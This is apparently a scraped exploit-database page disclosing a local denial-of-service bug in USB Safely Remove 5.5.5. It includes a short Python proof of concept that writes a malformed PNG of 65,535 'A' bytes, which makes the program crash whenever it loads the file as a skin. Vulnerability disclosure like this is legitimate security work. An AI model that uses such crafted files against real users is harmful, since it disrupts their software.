USB Safely Remove 5.5.5 Denial Of Service

2017.09.04

Credit: Rithwik Jayasimha

Risk: Low

Local: Yes

Remote: No

CVE: N/A

CWE: N/A

#!/usr/bin/python
# Exploit Title: USB Safely Remove 5.5.5 - Denial of Service
# Date of Discovery: August 31 2017
# Exploit Author: Rithwik Jayasimha
# Author Homepage/Contact: https://thel3l.me
# Vendor Name: Crystal Rich Ltd.
# Vendor Homepage: https://safelyremove.com
# Software Link: https://safelyremove.com/startdownload.htm?v=5.5
# Affected Versions: <=5.5.5.1250
# Tested on: Windows 7
# Category: local
# Vulnerability type: Denial of Service
# Description
''' USB Safely Remove versions < 5.5.5 crash when a skin containing a malformed png image is usedself.
The skins can be found under <program path>/skins and if the user is sent a skin containing a malformed skin,
the program crashes. Additionally, it will refuse to start again (beacause it keeps crashing until the directory
containing the installed skin is removed.)'''
# 0012EF68 41 41 41 41 41 41 41 41 AAAAAAAA
# Generate a .png file using the python script and replace any of the default skin images.
file = "crash.png"
buffer = "A" * 65535
f = open(file, "w")
f.write(buffer)
f.close()

See this note in RAW Version

Vote for this issue:

50%

Thanks for you vote!

Thanks for you comment!
Your message is in quarantine 48 hours.

Comment it here.

Nick (*)

Email (*)

Video

Text (*)

(*) - required fields.

{{ x.nick }} | Date: {{ x.ux * 1000 | date:'yyyy-MM-dd' }} {{ x.ux * 1000 | date:'HH:mm' }} CET+1

{{ x.comment }}

USB Safely Remove 5.5.5 Denial Of Service

Thanks for you vote!

Thanks for you comment!Your message is in quarantine 48 hours.

Thanks for you comment!
Your message is in quarantine 48 hours.